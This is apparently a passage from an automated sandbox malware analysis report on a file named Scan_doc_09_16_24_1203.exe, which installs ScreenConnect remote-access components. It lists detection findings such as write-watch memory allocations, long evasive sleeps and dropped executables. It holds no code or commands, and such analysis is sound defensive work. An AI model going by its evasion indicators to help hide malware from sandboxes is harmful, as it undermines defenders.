Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 261F55C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Memory allocated: 261F7020000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 8D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 1A2E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 1830000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 3350000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 3180000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 1C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 1E10000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Memory allocated: 1C40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 1780000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 1B320000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 1630000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Memory allocated: 1AE20000 memory reserve \| memory write watch

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599780	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599669	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599411	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599290	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 599184	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598926	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597977	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597630	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597512	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597368	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597253	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 597015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596687	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596469	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596358	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596250	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 596030	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595516	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595365	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595234	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595125	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 595015	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594906	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594797	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594562	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594452	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594344	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594219	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594109	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 594000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593890	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593781	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593672	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593561	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593343	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593230	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 593114	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592760	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592639	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Thread delayed: delay time: 592531	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe	Thread delayed: delay time: 922337203685477

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 6662			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Window / User API: threadDelayed 2922			Jump to behavior

Found dropped PE file which has not been started or loaded

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Core.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsFileManager.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471\ScreenConnect.ClientService.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Windows.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\Deployment\LNBCHYL3.N8V\X3NTDBMA.2EB\ScreenConnect.Client.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe	Jump to dropped file

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\Scan_doc_09_16_24_1203.exe TID: 7136	Thread sleep time: -40000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599780s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599669s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599411s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599290s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -599184s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -598926s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -598625s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -598234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597977s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597766s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597630s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597512s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597368s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597253s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -597015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596687s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596578s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596469s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596358s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596250s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596140s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -596030s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595703s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595516s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595365s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595234s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595125s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -595015s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594906s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594797s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594562s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594452s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594344s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594219s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594109s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -594000s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593890s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593781s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593672s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593561s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593453s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593343s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593230s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -593114s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -592953s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -592760s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -592639s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe TID: 6536	Thread sleep time: -592531s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 332	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7436	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.ClientService.exe TID: 7472	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Apps\2.0\J1YPWLR7.XWH\PYK78CCC.BVG\scre..tion_25b0fbb6ef7eb094_0018.0002_41099df9c1cd11bc\ScreenConnect.WindowsClient.exe TID: 7684	Thread sleep time: -922337203685477s >= -30000s

Queries disk information (often used to detect virtual machines)

